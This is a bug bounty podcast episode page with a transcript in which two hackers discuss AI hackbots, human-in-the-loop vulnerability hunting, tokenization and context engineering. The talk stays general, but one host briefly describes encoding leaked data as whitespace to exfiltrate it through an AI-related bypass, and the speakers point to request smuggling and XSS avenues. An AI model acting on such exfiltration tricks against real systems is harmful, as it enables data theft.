Episode 129: Is this how Bug Bounty Ends?

Episode 129: In this episode of Critical Thinking - Bug Bounty Podcast we chat about the future of hack bots and human-AI collaboration, the challenges posed by tokenization, and the need for cybersecurity professionals to adapt to the evolving landscape of hacking in the age of AI
Follow us on twitter at: https://x.com/ctbbpodcast
Got any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.io
Shoutout to YTCracker for the awesome intro music!
====== Links ======
Follow your hosts Rhynorater and Rez0 on Twitter:
====== Ways to Support CTBBPodcast ======
Hop on the CTBB Discord at https://ctbb.show/discord!
We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.
You can also find some hacker swag at https://ctbb.show/merch!
====== This Week in Bug Bounty ======
Improper error handling in async cryptographic operations crashes process
https://hackerone.com/reports/2817648
Recon Series #6: Excavating hidden artifacts with Wayback Machine
https://www.yeswehack.com/learn-bug-bounty/recon-wayback-machine-web-archive
====== Resources ======
This is How They Tell Me Bug Bounty Ends
https://josephthacker.com/hacking/2025/06/09/this-is-how-they-tell-me-bug-bounty-ends.html
Welcome, Hackbots: How AI Is Shaping the Future of Vulnerability Discovery
https://www.hackerone.com/blog/welcome-hackbots-how-ai-shaping-future-vulnerability-discovery
Glitch Token
https://www.youtube.com/watch?v=WO2X3oZEJOA
Conducting smarter intelligences than me: new orchestras
https://southbridge-research.notion.site/conducting-smarter-intelligences-than-me
====== Timestamps ======
(00:00:00) Introduction
(00:04:05) Is this how Bug Bounty Ends?
(00:11:14) Hackbots and handling leads
(00:20:50) Hacker chain of thought & Tokenization
(00:32:54) Context Engineering
Title: Transcript - Thu, 03 Jul 2025 12:34:33 GMT
Date: Thu, 03 Jul 2025 12:34:33 GMT, Duration: [00:36:15.42]
[00:00:00.96] - Justin Gardner
That resulted in a single token. So Solid Gold Magikarp is one token. And in GPT2, if you ever mentioned Solid Gold Magikarp, it thought you were saying like, f you or something. You got to look this up. There's like a YouTube video about it. Anytime you said that it would respond, it would, like, curse at you. It was really funny. Best part of hacking, when you can just, you know, critical things. Yeah, soon.
[00:00:40.00] - Justin Gardner
Alrighty. Sup y' all? We've got that this Week in Bug Bounty segment for this week. We've got this week's 'This Week in Bug Bounty' segment. And what we've got on the docket this time is a couple updates. Yes, we Hack has a new article that came out not too long ago, Recon series six. And this is entitled Excavating Hidden Artifacts with Wayback Machine and Other Web Archive Tools, which I thought was particularly timely today because I am taking a break from hacking something during which I just had a breakthrough using these tools to come and tell you about these tools. So if you're not familiar with how to use way more, or if you're still using gal like giveaway was, then you should definitely read through this article and kind of get up to date on using way more to do a little bit more thorough investigation of the archive. Wayback Archive definitely a pivotal piece of technology for hackers. Also, I know that they're always raising funds. Like, they're always like, please give us money so that we can continue running this nonprofit. We need to keep this thing alive, guys, because countless crits have been popped because of the Wayback Machine. And this article is a really great way to sort of get up to date on it using way more link finder, gao, all sorts of stuff. So definitely check it out. All right. Second update is from a HackerOne disclosed report. This one was report 2817648. And check this out, guys. This is a C related error where signed bits derive sign traits derive bits, which is a C function in the node JS core source code may incorrectly call throw exception on user supplied input in the background process crashing all of node js. So the reason this was relevant is because it actually, you know, you can affect availability completely and you know, things getting passed into these cryptographic functions are often untrusted user input. So this is definitely something you want to keep an eye out for. I kind of went and checked at the patch for this and essentially the patch was just checking whether it should be able to throw or not. And so I think that there's a couple of ways this could be exploited. Obviously we don't want to affect availability too much, but if you have some way to fingerprint it's running on an older version of Node js, then that could be. This could be a really cool attack. And while I was researching it, I actually came across this other exploit that was released in that same May 2025 update, which is a improper header block termination in LHDP, which is a piece of Node JS. And this was actually found by Ken Vallis, who is the guy from HTTP Garden who we've talked about a couple times. And essentially it allows for Improper termination of HTTP 1 headers using R N R X rather than the required R N R N. So very, very interesting piece. If you're interested in request smuggling, this could be something that you could use to potentially trigger some really impactful request smuggling vulnerabilities. It only got a medium and didn't get a ton of attention somehow, but I know that a lot of you guys have really intense HTTP request smuggling automation out there, so this would be a good one to toss on it. All right, that's all for the this weekend bug bounty segment. Let's go back to the show. All right, listen, dude, I've got. I've got a little bit of a bone to pick with you. Okay? This blog post. This is how they tell me bug bounty ends. Is this, Is this fud? Dude, is this FUD or is this not fud? Because I read it and I was like a little bit moved. But also I'm like, I don't know.
[00:04:28.20] - Joseph Thacker
I've been in some meetings with you where you felt pretty moved.
[00:04:31.37] - Justin Gardner
Yeah, I am. I am moved. I am moved. And I'll be transparent about it. I mean, it definitely this blog post made me realize that if I want to be on the. If I really, really do want to stay ahead of the curve, right. By a lot, then I need to start doing, you know, AI agent based hacking now.
[00:04:53.06] - Joseph Thacker
You need to be more enhanced by.
[00:04:55.45] - Justin Gardner
Yeah, yeah. And if I want to perform at the highest level. Right. I mean, yeah, I think, I think.
[00:05:01.93] - Joseph Thacker
That the reason why I tweeted it in such a way where it's like, you might love this or you might hate this. And the reason why the blog post even reads in like an ambiguous, like just slightly ambiguous way is because I feel the same way. Right? I'm just, I'm in the same boat as you. Like, it's hard for me to even tell if it is fud, but it's just My honest opinion and, you know, maybe, maybe you'll tease out that.
[00:05:21.12] - Justin Gardner
Haven't read the blog post. Give us like the TLDR of it.
[00:05:24.20] - Joseph Thacker
I think the major points I wanted to make was people who are putting their head in the sand and they think that AI is not going to be able to do what human hackers can do. They're wrong. They're crazy. I think that, like, you know, I've met with a lot of hackbot founders, I'm an advisor for Ethiac, and so I think that these models can definitely hack. And I think that the people on the other end of the spectrum are wrong too. Like people who think that, you know, all the bug biting hunters are going to be out of their job in six months or a year are also wrong. And so the attack that I would, you know, this blog post is basically me laying out what I think is going to happen. I guess I can give you like a two sentence summary of that. I basically think that the first step in the transition is going to be called like hacker in the loop or you know, basically human in the loop. But you're going to have like top hackers like you, or like, you know, other top hackers using AI to hack faster, better, smarter and also to like the. The AI actually needs us to vet a lot of the, what it thinks is true positive because it just takes a lot of context and a lot of skill to know really when something is a true positive.
[00:06:24.82] - Justin Gardner
Are we going to have that context though, if we're not in the weeds? Like, that is one of the things that's really interesting to me. Like, sure, I can be like, hey, look, here's the single point of failure in the system. If you can fuzz this and get it to return a domain that is not in this specific allow list or whatever, then we've got an SSRF or whatever, and then hand it to the AI and let it do all of the intelligent fuzzing in context aware stuff. But that's me, you know, using the AI sort of as a tool and my context is greater than the AI's context. And I'm wondering if it's ever going to get to the point where my context is lower and the AI's context is greater and that is how we hack.
[00:07:05.36] - Joseph Thacker
Yeah. So let's just for the topic of this conversation, it might not be called this, but for this conversation let's call that a black bot hacking, like hackbot. Right. So, so for black box hackbots that basically are just like set to go hack on a domain and then it comes back, it's like less of a tool and more of like a fully embodied agent. Right. And then it comes back to you and it's like, hey, these are the leads. I think for a lot of those you will be able to very quickly, like, let's say it came back to you as a front end guy. And it's like, hey, I think there's a client side patch reversal here. And here's my request. That's a poc. And here's the response from the, here's the response that appears. And here's the screenshot from the headless browser. You know, is this true? You know, you don't think you'd be able to vet it without having to like dig up some. You could. Yeah, yeah. And so I think that that's the case. There will be some that are really complex. It's like, I don't know if this is working or not, you know, but I think that in general those are going to be the ones that are the last to be found. I think that like, you know, the AI, the AI says, I think XSS is popping here because here's the input, here's the response from the server, and here's the screenshot of the alert box. And you're like, well, that's a pretty close shut case, right?
[00:08:09.18] - Justin Gardner
Yeah, exactly.
[00:08:10.11] - Joseph Thacker
And so, yeah, so I think that it's, it just really varies vulnerability to vulnerability. And maybe that's why it gets so complex to like talk about is because there are some bugs that a will like not be able to find for 10 years, maybe or 30 years. Right. Like, but there are a lot of other vulnerabilities that I think AI will be able to find. And as soon as the price point is low enough where they can spin up. Well, I always call this the hackbot singularity. But if there's a point at which you can spin up a hackbot and it costs $10 a run, but it makes you $20 in bounties, any person, any sane person is just gonna spin up as many as they can until it becomes non profitable. Right, right.
[00:08:42.28] - Justin Gardner
Yeah. And I mean that's the same sort of thing you see with, and applying those same principles from business with advertising and stuff like that. Right. Like if you have an advertising model that is generating you $10 and cost $5, then you're just going to keep pressing that button as fast as you possibly can. Yeah, yeah. And, and I can definitely see that happening. I definitely agree with you that it is more I think, I think there will be a lot of value to these agents that are, you know, black bot agents. But I, I think that the, the main thing that I'm convinced on right now after our, our talks and after just a couple timely interactions, plus your blog post. Right. Like I, I, I fed something that I was working on to Gemini the other day and Gemini like took it and like ran some tools to parse it and like, and, and really did some. And it was actually, it's interesting that we were talking about this off air about how, you know, it's a little bit less good with binary based stuff. This was one of those cases where it was like base 64 encoded binary protocol and it like, and I was like, oh my gosh, this is crazy.
[00:09:48.99] - Joseph Thacker
Yeah, that's a little pro tip. Anytime you're dealing with something that requires like tough accuracy. I was dealing with like a neat like AI related kind of bypass I was working on where I needed to convert the data I was trying to leak into binary, but where the 0 was a new line and the 1 was a space. And so like I wanted the model to basically write me a payload or like write a little server that would like handle that well and stuff. And because it was like weird syntax, like, you know, the AI has never been trained on binary. That's spaces and new lines probably. Yeah, I kept messing up the format and I was like, just use your code interpreter tool to convert it. So then it like wrote it in binary, then converted it for me in like its little code interpreter. And that's like a really good pro tip. Like when you're dealing with stuff like you're talking about, just tell it to say like, hey, you keep being inaccurate. Use your code interpreter tool here.
[00:10:34.94] - Justin Gardner
Yeah, that's, that's, that's a great call. Yeah, the code interpreter, the, in that specific environment did phenomenally well. And I was really, I was kind of like jaw drop moment on that. I was like, I gotta start integrating this a little bit more. And then your blog post came out like the same day and I'm like, shit, shit, shit, shit, shit.
[00:10:51.58] - Joseph Thacker
It does take a lot of time to write a good prompt sometimes for these like really complex vulnerabilities that we're often chasing down as hackers. But I think that if you take the time to do it and give it to smart models like the latest Gemini 2.5 Pro or you know, even O3 Pro, which just dropped, I think that they'll often surprise you. Like, I think that a lot of hackers would be surprised by how much, how much it would speed them up or by how many just good ideas it's going to have.
[00:11:16.51] - Justin Gardner
Yeah. And just sort of tangentially related to this. And, and as a counterpoint to the whole agent thing, I've been following a little bit the Hacktron AI folks.
[00:11:26.24] - Joseph Thacker
Yep.
[00:11:26.91] - Justin Gardner
And, and yeah, and I think one of the founders, I forget who it was, I can't find the tree right now, tweeted something out like this is the future of hacking. I set Hacktron AI to work on this and I went and grabbed a coffee and then I came back and I had four leads to follow. Right. And. And then, you know, I went and followed those and maybe popped one of them or whatever. Right.
[00:11:45.69] - Joseph Thacker
Yeah.
[00:11:46.00] - Justin Gardner
And, and I think that is an interesting, I think that's an interesting take because it's not necessarily saying that this hack drawn AI is going to just, you know, you're gonna go grab coffee and come back. Hacktron is like here's your report. You know, but it maybe it can identify things that are higher signal sketchy than normal programmatic tools can.
[00:12:05.94] - Joseph Thacker
Yeah.
[00:12:06.46] - Justin Gardner
Right. Or non AI using tools can. And then you feed those leads to you know, a closer. Right. We've talked about this a little bit on the pod before how you've got various people in the, with various skill sets in bug bounty. A lot of some people are like really good lead generators. Some of you know, as far as like finding sketchy stuff, some people are really good exploitationists. Right. Or exploitists. Right. And they can close, close the, you know, the vuln and I think maybe another interesting position for AI could be that it will produce really good leads and hand it to a talented expletist to. To close the loop on.
[00:12:41.50] - Joseph Thacker
Yeah. So this is something I've talked about. Not only do I am my advisor for one hack about company, but for the other ones when I, when I do like a call with these founders as like kind of like a VC scouting thing, I will often give them like really great advice just because I love adding value to the world and I want to see everything improve. But I genuinely think that how these hackbot companies handle leads is going to be huge. And I think it's because exactly what you're talking about. Right. Every lead is a potential vuln and I think that some of the companies are over indexing on fully black box. When the reason why I mentioned in my blog post like the human in the loop hackbot Singularity is like a midterm spot is because of exactly what you're talking about. And here's my exact quote on what you're talking about. I said one good hacker and a hack bot system working together, we'll be able to out hack almost everyone from a volume perspective. And that's what I believe. I mean if I could feed you a list, Justin, of like, I don't know, 10 potential XSS and 10 potential CSPT and 10 potential RCE via command injection and you're literally just like betting them like, oh yeah, that one is a bug. Nope, that one's not. Yeah, that one is. If they're actually a decently high signal, even if it's only like 30% accurate, like you would be able to make a lot of money from just like reviewing bugs.
[00:13:55.49] - Justin Gardner
And it's almost like what we see with the critical thinkers hack alongs, right Is like, you know, with the hack alongs obviously we have a ton of super talented hackers, you know, participating in the hack alongs and in the critical thinking discord. But I've been surprised by a couple people that, that you know, I would, I would consider as like solid like intermediate hackers. Right. You know, that really are getting really good at some stuff but are definitely fresher on the scene. Right. And you know, when we're hacking together, I'm going down one route and then almost every single time somebody will drop in the chat and be like, hey, look at this sketchy thing that I just found.
[00:14:30.30] - Joseph Thacker
Yep.
[00:14:30.66] - Justin Gardner
Right. So if, if, and I just love that, right, because it's like, okay, and then you know, I'll take that and close the loop on it and exploit it or something like that or maybe somebody else who's better than me in the chat will do it, you know, and it happens almost every time we do a hack along, right. And, and I think that if, if just applying this to AI, if you can get the AI to be at at a level of like intermediate hacker as far as like intuition of whether a functionality is sketchy or not, then essentially hacking becomes, here's a bunch of leads from an intermediate hacker, skilled hacker. Now your job is to be the closer.
[00:15:06.83] - Joseph Thacker
Yeah, I think it's much more likely that it's able to find the sketchy leads than it is to be able to be a closer. Like I think, I think that the closer is going to come later. I do think that its big upside. The big advantage it has to closing is infinite time, like near infinite time and near infinite attempts. Right. So if it's trying to find a very specific payload that will bypass a specific filter it can try infinitely, right? Assuming that the financial incentives align, it can literally try as many times as it wants. And it's infinitely patient. Right. And so I think that really that's the advantage on it being a closer is that it can just try so many things in such a short amount of time and you can scale it up so well. But I think in general it's going to be much better at finding the weird things.
[00:15:48.53] - Justin Gardner
Those people that have taken notes really have a massive advantage now with AI as well, is like, you know, I have been a largely intuition based and just rep space hacker to this point and like, you know, I don't have like a massive notion or whatever filled with how I approach every single target and every note from every live hacking event. And I'm really wishing I did now because there are. This is a massive opportunity for us to stay say, hey, you know, sometimes if you change the host header, you know, on a password reset, you know, then it's going to trigger this thing and just give them all of the weird shit you've seen, every single weird shit you've seen. Right. And then, and then hope that it has the ability to properly implement that and alert you if something looks even remotely sketchy, you know, and draw those techniques back to your mind because we've talked about this time and time again how, you know, some bones are popular for a period and then you stop testing those and you're like, for whatever reason, maybe you got shiny object syndrome and now you're looking at for this new.
[00:16:47.62] - Joseph Thacker
Well, I mean, none of us are as disciplined as space raccoon to go through like a spreadsheet of like all the vulns that I want to check across every API endpoint. Right?
[00:16:55.14] - Justin Gardner
Yeah, exactly. Yeah, it's, it's, it's a lot, man. It's a lot. And, and I think AI can really help with that. So yeah, man, for those of you that have really good details, notes on your methodology, this is like a big dub for you.
[00:17:07.23] - Joseph Thacker
Yeah, I think so.
[00:17:09.00] - Justin Gardner
Shout out to my boy Gret me.
[00:17:10.00] - Joseph Thacker
I know I was about to say that exact thing. I was like, I know the guy who does that. Yeah. So I don't know that I said all of my other major points that I wanted to make with this. The other thing that I wanted to make a point of is I just think as kind of like proof to call my shot here is that I think we'll hit that human in the loop Hackbot singularity by the end of the year and there will be a company that farms 500 to 1,000 vulnerabilities by the end of the year. And I think that that's going to be very impressive. I mean Expo is already like the quote unquote top hacker in the US And I think that it's exactly what we're talking about. Right. I'm sure that it's Dorado and Pottermia or whatever and honestly the bug money platforms need to decide how they're going to handle that because it's kind of a shared account.
[00:17:51.45] - Justin Gardner
Yeah, yeah, that's interesting.
[00:17:53.45] - Joseph Thacker
But it is something that we need to think about.
[00:17:55.13] - Justin Gardner
Well, HackerOne released something on that, right? Like HackerOne hack bot. Yeah. And we super lightly covered it on the pod. But there is a write up from one of the co founders, Mikhail on Welcome hackbots. How AI is shaping the future of vulnerability discovery. We'll link it, we'll link it again. But yeah, I mean I think that they don't really have any choice but to allow hackbots to compete. But maybe there's a separate leaderboard for or maybe you can flag a specific account as like a hackbot account or something like that. I don't know.
[00:18:29.45] - Joseph Thacker
Yeah one. So another thing that I want to get across with it was just positivity amidst job loss. Like I think that there will be impact to hackers for sure in the long term, but I think in the medium term people can be really encouraged because one, we will need human in the loop. So I do think the hackers should maybe think about what they want that to look like and maybe either make it known on social media or reach out to these hackbot companies and be like I would, I think that the best model for this is like contract based work rather than like hiring these bug hunters. Like buck hunters. Love being full time. I do. And so like I would love if the model is such that I'm kind of like sponsored by Ethiac or whatever and then I use that in my daily driver to both improve their product and splitting the bounties with them and you know, we kind of both get the exposure, the exposure for it. I think that'd be a lot better. But I mean honestly even if you're, if you're a bug bounty hunter and you are kind of worried about this, maybe looking to apply to hackboard companies is a smart decision. I do think there will be a lot of money wrapped up in this for multiple reasons. One is it's just huge for humanity to like be able to secure everything in an automated fashion fashion. Two, it's Like a very strong nation state related superpower. Like, I am a believer that AI alignment is like a really big deal and the issues that could arise from a, you know, somewhat unsafely wielded AI, like if there's a, you know, a nation state that we don't trust down the line and they're using AI to do nefarious things, they're going to need to, they're going to want to use it for BioWare and they're going to want to use it for hacking. And so like by, I don't know, by contributing to this effort, I think that you're kind of helping humanity in like a really powerful way too.
[00:20:08.73] - Justin Gardner
Yeah, yeah, yeah. So anyway, my, I mean just my take away from your blog and, and just my experiences at that point was really I need to begin the process of taking my methodology and what I'm doing and getting it into prompts and getting it into, you know, something that's raggable or, or something, you know, so that the AI can eventually use it once we have particularly these more human in the loop microbots sort of thing going on. So I don't know, it's a little bit of a hard thing for me because I'm like, I don't really feel like taking a break from the hacking, you know, to really dev on this a lot and try to get it to a point where I can do this. But I'm kind of at the point where I'm like kind of to do that.
[00:20:52.13] - Joseph Thacker
So yeah, two things and we're prone to go down rabbit hole. So I'm just telling you these so they don't forget to touch them.
[00:20:57.32] - Justin Gardner
Yeah.
[00:20:57.73] - Joseph Thacker
One is what you're talking about right now. I think that I want to talk about the hacker kind of thought. Thought process as they exploit bugs. But the second thing I want to talk about with you is tokenization. I know we talked about that off air and I want to circle back to that.
[00:21:11.65] - Justin Gardner
Yeah. And also I want to. Yeah, I know what we need to do is just go in the dock, go, go over to the doc right now and write some of those down. So token tokenization. And what was the other one you said?
[00:21:24.02] - Joseph Thacker
Basically hackers chain of thought. Really?
[00:21:26.26] - Justin Gardner
Hacker chain of thought. Yeah.
[00:21:27.54] - Joseph Thacker
And what is, what was yours?
[00:21:28.82] - Justin Gardner
What mine was was this other, other note as well, which is the reason that I got out of the automation game, you know, back in like 2022, is that I don't like coding as much as I like hacking. Yeah, right. And I found that I was spending a Lot of my time coding instead of hacking. Yep. And that is, that changed a lot recently, you know, like with the onset of, of AI assisted coding. So one of the things I've considered is I've always that passive income piece or passively finding bugs is. Has been really attractive, but it was offset by the, the thing I didn't like, which is that I had to code all the time and that that offset has been erased by AI a little bit or at least lessened. So I am definitely putting more thought and consideration into going back into the automation game, whether it be hard automation or AI based automation with supplementation from code assisting AI.
[00:22:23.96] - Joseph Thacker
Cool. Yeah. So the two things I want to mention, one was the chain of thought from hackers. This is just kind of a pro tip for one, when you take down your notes. But two, I think for these hackbot companies and three, just for other hackers, the ideal context for an AI model when it's trying to exploit a CSPT is your thoughts. And I mean literally Justin Gardner's thoughts. Because I think you're probably one of the foremost CSPT people, right. And you have extremely good chain of thought in your brain. Like basically your notes. Like, like your what? What? Why do you think CSPT exists here? Okay, write that down. Okay, what is the first thing you're going to attempt to check whether it exists there? Okay, write that down. Okay, it failed because of this. So your next payload is going to be what and why? And okay, that failed. Okay, your next payload is going to be what and why? Oh, it worked. Okay, cool. So you found it. Okay, now how do we leverage this into a vulnerability? Okay, what do you look for next in the application? Okay, write that down. Right. It's like basically every thought you're having as you're exploiting something is the ideal context for an AI language model when it's trying to exploit the exact same thing. And so I've always wanted to have like Sam Curry's internal. I've called it Internal Monologue and I even made a little app called like Internal Monologue Capture. I think that like Internal Monologue Capture is actually a space for a product here. If there was some, if there was some way where it would like continually ask you questions or ask you to talk out loud and then it would capture that for you. Anyways, I think expert. Expert Internal Monologue Capture is something me and Daniel Niesler talked about over a year ago when I was hanging out his house at rsa. And I still super key to today.
[00:23:59.17] - Justin Gardner
So dude, absolutely freaking Lutely. And I think that is so hard to do. And I have a lot of experience with that because of the, the menteeing, you know, mentor, mentee relationship, where a lot of times what I'll do sometimes with these, with these mentees is I'll hack on something. I'll just narrate what I'm saying.
[00:24:17.49] - Joseph Thacker
Yeah.
[00:24:17.80] - Justin Gardner
And, and my mentees are probably going to be like, shut the fuck up, Justin. Because what it actually sounds like is, oh, guys, check this. And then I just like stop talking. And they're like, what do you mean? What do you mean? And I've been trying to get better at it. And anybody who listens to the hack alongs also know that I am very prone to start, start narrating something and then get hijacked by like, oh, I need to allocate all of my mental resources to this one thing really quickly. And then, and then not finish my thought. But I think as you get more reps with that, that is a very, like, is going to be a very valuable skill. And especially if there's some product like you're saying that will essentially just be listening to me talk. Because I feel like that is the most natural way of conveying your thoughts without friction to yourself. And then convert that into a chain of reasoning that the AI can consume to mimic your skill set in a specific area.
[00:25:10.56] - Joseph Thacker
Right. It becomes basically the perfect system problem for a sub agent that wants to exploit that same vulnerability.
[00:25:15.45] - Justin Gardner
Yeah.
[00:25:16.00] - Joseph Thacker
All right. Tokenization. So I found the quote from Karpathy.
[00:25:19.13] - Justin Gardner
Yeah.
[00:25:19.56] - Joseph Thacker
So if anyone's listening and you don't know what tokenization is, you need to go look it up. But I'll summarize it in like two sentences here. Tokenization is the way that AI models view the world because they've been trained on what are called tokens. Tokens are just strings that are associated to numbers and those floating port numbers are like what technically the model outputs. Whenever it, you know, answers your question or whatever, it just gets converted back to the token, which is back to the string, which is sometimes a full word, sometimes it's only a character. You can look up tokenizers to see how it works. But the whole point is tokenizers are the root of all problems. So I really love this. So this is, this is from Andre Karpathy, the father of modern LLMs and AI. He's like very well known, well regarded. Why can't LLM spell words? Tokenization. Why can't LLMs do super simple string processing tasks like reversing A string tokenization. Why is. Why are LLMs worse at non English English languages like Japanese tokenization? Why is LLM bad at simple simple math tokenization? Why did GPT2 have more than necessary trouble coding in Python tokenization? Why did my LLM abrupt abruptly halt when I sent it the string Open bracket pipe end of text pipe Close bracket tokenization? Yeah, like why does it break whenever I ask about solid gold mag harp, which you don't know about? You should go watch that YouTube video. It's called Gold Magikarp.
[00:26:32.04] - Justin Gardner
What the.
[00:26:32.41] - Joseph Thacker
No, you don't know about this?
[00:26:33.41] - Justin Gardner
No.
[00:26:33.76] - Joseph Thacker
There's a thing called glitch tokens in. So glitch tokens don't really exist anymore, but basically when they were scraping the data for training data from Reddit, there was a few tokens like solid Gold Magikarp, Camel case, but all with no spaces that resulted in a single token. So solid Gold Magikarp is one token and in GPT2, if you ever mentioned solid Gold Magikarp, it thought you were saying like fu or something. You got to look this up. There's like a YouTube video.
[00:27:00.58] - Justin Gardner
About it.
[00:27:01.86] - Joseph Thacker
Anytime you said that it would respond, it would like curse at you. It was really funny. So you got to go look this up. It's called glitch tokens and it's by computer file on YouTube. I'll put it in the show notes. Anyways, so the whole point is the. Our brains see the world and like we're somehow able to like switch between tokens so we can see the world as words, like when we read a book, but we can also see the world as characters when we need to. Right? Like special characters. And so we have like this kind of superpower that AI doesn't have. And so I was bringing this up to Justin before we started this episode, but I wanted to mention it because like AI doing things like HTTP desync attacks or request smuggling, it's basically impossible due to tokenization because it can't count. It doesn't really understand how to count the number of spaces it's using. And that's more of like an arithmetic thing, right? And so maybe it'll be able to figure it out if it like writes two parts of a. Of a smuggled request and then it sends both of them into Python code to count the number of char to then set the context link. But it's going to be super hard. And that's an example of a vulnerability that like, I don't know if AI will solve even 10 years down the road. Like it's going to be a vulnerability that it's going to take a very long time. Like where maybe we don't even use tokenizers because there's been some, like, theories that eventually we can just make each character a token and train a model that's eventually good like that. And if it viewed the world in characters, I think it could potentially pull it off. But anyways, tokenization is really fascinating and interesting, and I think that it does impact the amount of vulnerabilities that can and cannot get automated at the moment.
[00:28:26.60] - Justin Gardner
I definitely didn't think about the fact that before you mentioned it right before this episode, that these LLMs are thinking and living in the token world from an output perspective as well as an input. Yes, I knew that from an input perspective. But they're also outputting tokens, and if they don't have access to a specific set of tokens, then they can know they're not going to output, or maybe the weights are off, they're not going to output the token that you need. Even though, like, that was very clearly iterated as the purpose or whatever.
[00:28:59.16] - Joseph Thacker
Yeah.
[00:28:59.72] - Justin Gardner
And that's where I think the difference comes between like actual artificial intelligence and, you know, fabricated artificial intelligence here. And that is something that I really.
[00:29:11.16] - Joseph Thacker
Hadn'T thought about because I will challenge your last assumption there. We also hallucinate. Sometimes we can't think of the word. Sometimes it pops up in a different way. Like just because the method of thinking. I mean, I don't think that they're conscious. I don't think that they have a soul. And we don't have to get in all that. But I do think that just because the way in which these top models think doesn't mirror exactly how we think, I don't think that means they're not necessarily reasoning. There's some really interesting research from Anthropic that shows that even before a model outputs a token, it passes through different circuits in its internal next token prediction. That mimics very similar thinking. It's bouncing around on different topics that are all related to the answer even before it emits a single token. It's very, very fascinating stuff.
[00:29:55.89] - Justin Gardner
Yeah, but that is. That is very interesting. Definitely not smart enough to make a qualified assertion about that. That's fine.
[00:30:02.36] - Joseph Thacker
But what you're talking about there about like, the words is like, very fascinating. There are some weird token I've been using Cursor or. Sorry. Wow. Chorus. Chorus is like a really cool thing. I used to use Misty app. Now I use chorus to like ask one question to multiple models at the same time. If you haven't used it, it's great. But I saw someone talking about it on x and Gemini 2.5 Pro, putting in the cheeky Russian there. They asked the English question and it responded in English. All the models that it was answering in parallel responded in English. But Gemini 25 Pro threw in a random Russian word and it meant the exact same. Like you could understand it if you read it in English because it was like, according, it was some word that you could easily tell what it should have been in English, but it clearly just lived in the latent space of the wait at the exact same spot. And so it just picked the wrong token as it was passing through. And so anyway, stuff like that's really interesting and I'm surprised we don't see more of it it.
[00:30:51.83] - Justin Gardner
But yeah, definitely, definitely interesting. And I think going back to the human, you know, thinking versus AI thinking, I definitely don't know enough about that to make a conjecture. But I do think that like you said, it affects the granularity of what the AIs can output. And I think that perhaps I'm, I'm misconstruing how human neural networks work, but I think that a deeper understanding, like conceptual understanding of what a character is and what, you know, a character string looks like is something that differentiates. And as I'm saying that, I'm also realizing though that as, as a beginner, you think about an XSS payload as an XSS payload, not as an image tag and a source attribute and you know, an invalid source attribute and an on air attribute and you know, like, so you know, that's what exactly what, you know, beginner hackers are doing when they're copy and pasting these XS payloads is like, they consider that one token rather than a deeper concept or different understanding of that specific payload.
[00:31:55.32] - Joseph Thacker
I know you've only got one minute, but I had that exact same thought. I thought about how you could plug the hole of tokenization character by character would be basically to imagine getting a whole bunch of conversations, like simulated conversations, you know, how they do training on back and forth conversations. Imagine if there was a bunch of conversations, like fake conversations between me and an AI, or you and an AI, or whatever, where it was basically quizzing it on characters. So like, basically what I'm trying to say is like, I wonder if we gave these top AI models a whole bunch of content about like what a character is and how it's different than like the word like Though, like, for example, what are the tokens in the word strawberry? And it was expected to respond S, T, R, A, W, B, E. If we gave it like a trillion examples of those and threw that into the training set, if it would develop its own sense of what a character is in such a way that would improve the output, I actually genuinely think that could work. But anyways, it was just a thought I had.
[00:32:54.67] - Justin Gardner
Very interesting. Dude. Okay, I, like you said, I do have a hard stop, but. And I might throw you to the wolves here a little bit, Joseph, but I think the conversation that are the concept you gave me about context engineering is really interesting. So I don't know if you want to talk about that. You can bleep it. Richard can bleep it if you don't want to, but if you felt like it, you could spend a couple minutes just sort of explaining how difficult that problem is and how relevant it is to hackers. Or we can cover it a different time. Either way.
[00:33:20.53] - Joseph Thacker
Cool. Do you have something to say for it or are you going to drop?
[00:33:22.50] - Justin Gardner
No, I'm going to. I got to bounce.
[00:33:23.61] - Joseph Thacker
Okay, cool. I'll say. Describe it. All right.
[00:33:25.66] - Justin Gardner
You got it, man.
[00:33:26.25] - Joseph Thacker
All right. Yeah. So me and Justin, before we hopped on the air, we're talking about what I'm calling context engineering. It came out of a blog post from Hrishi, but also the founder of LangChain, his name is Harrison Chase, was talking about context engineering and how it's going to be really important. I think it's like, basically, if you imagine AI as like this bleeding technology, and then you imagine that the way in which you, like, develop and make. What are they called? Agents. Like, this is kind of like the year of agents is then kind of breaking technology on top of AI. So we have agentic behavior and then on top of that there's like sub agents. And how do you hand over context from some agents to other agents? Is what Hirishi, in this blog post he posted about, basically, we may talk about this in a future episode, but Hirishi Olikle is the best wielder of AI, in my opinion. And he wrote a blog post all about how he was reversing the minified JS of Claude Code from Anthropic. It's like, oh, hackers want to do that all the time. So I think that'd be really interesting. And so I shared it in the Critical Thinkers chat multiple times. But in there he calls these intermediates. But it's basically like the information that you have to hand off to get a task done. And so his kind of three examples are you have to sometimes hand off information to yourself when you go to work on the same project on the next day. Right. But then that's like the easiest form of handoff. Then the next step up is like you're handing it off to someone who also knows the project and the company really well. And then the next step up is like handing it to someone who doesn't know well or to an AI system that doesn't have all the context of like your company or your life or all the things that are going on. And so I think that's like pretty interesting. And it's basically how do you manage context between agents? And I think that's going to be really, really key from a hackbot perspective as well. Right, because you may have like a core hackbot that hands off something to an agent and it doesn't pass back enough context for the core agent to really make a true distinguish like a true validation of whether or not what the sub agent found is like a true positive or a false positive. And so anyways, that's just a cool hard problem to solve and Justin thought it was really neat and I think it's something we should all be like leaning into and working and looking into. Super thankful for your all's time and attention and I hope that you enjoyed the episode and we'll see you in another week.
[00:35:48.98] - Justin Gardner
And that's a wrap on this episode of Critical Thinking. Thanks so much for watching to the end y' all. If you want more Critical Thinking content or if you want to support the show, head over to CTBB Show Discord. You can hop in the community. There's lots of great high level hacking discussion happening there on top of the master classes, hack alongs, exclusive content and a full time hunters guild. If you're a full time hunter. It's a great time, trust me. All right, I'll see you there.